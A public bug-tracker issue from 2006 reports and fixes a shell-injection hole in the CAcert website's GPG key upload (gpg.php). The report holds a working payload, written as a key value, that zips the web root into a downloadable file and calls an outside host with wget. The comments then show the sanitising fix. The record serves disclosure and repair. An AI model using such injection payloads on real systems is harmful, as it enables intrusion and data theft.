View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0000245 | Main CAcert Website | GPG/PGP | public | 2006-05-28 21:15 | 2013-11-20 22:23 |
Reporter | TheSourcerer | Assigned To | |||
Priority | normal | Severity | block | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Fixed in Version | 2006 | ||||
Summary | 0000245: Shell escape | ||||
Description | The following GPG keys can be used to exploit a hole in the system: "; echo "Hi" >/tmp/test ; echo " "; zip -r /www/www/leak.zip /www ; echo " " ; wget http://www2.futureware.at/HoleInOne ; echo " results in the following request: 72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2" The hole is in the www/gpg.php line 45 | ||||
Tags | No tags attached. | ||||
Reviewed by | |||||
Test Instructions | |||||
related to | 0000148 | closed | site shouldn't rely on magic_quotes_gpc turned on |
|
This exploit was not possible some weeks ago. Updating the php might have introduced configuration changes. Seems to me as if magic_quotes_gpc has been turned off (thats Debian default) or magic_quotes_sybase as been turn on aswell (which would break the functionallity of magic_quotes_gpc). Possible solution: 1. turn on magic_quotes_gpc in php configuration 2. make sure magic_quotes_sybase is turned off 3. add something like function check_quotes($value) { return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value); } |
|
Line 44 actually... - $gpgkey = $_POST['CSR']; + $gpgkey = escapeshellarg($_POST['CSR']); |
|
escapeshellarg breaks gpg keys, instead a new functions was created to only allow base64 chars... function clean_csr($CSR) { return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR)); } $gpgkey = clean_csr(stripslashes($_REQUEST['CSR'])); |
Date Modified | Username | Field | Change |
---|---|---|---|
2006-05-28 21:15 | TheSourcerer | New Issue | |
2006-05-28 21:51 |
|
Relationship added | related to 0000148 |
2006-05-28 22:06 |
|
Note Added: 0000234 | |
2006-05-28 23:13 | duane | Note Added: 0000235 | |
2006-05-28 23:55 | duane | Note Added: 0000236 | |
2006-05-28 23:56 | duane | Status | new => closed |
2006-05-28 23:56 | duane | Resolution | open => fixed |
2006-05-28 23:56 | duane | Fixed in Version | => production |
2006-05-29 00:03 | duane | Note Edited: 0000236 | |
2013-01-14 08:46 | Werner Dworak | Fixed in Version | => 2006 |
2013-11-20 22:23 | NEOatNHNG | View Status | private => public |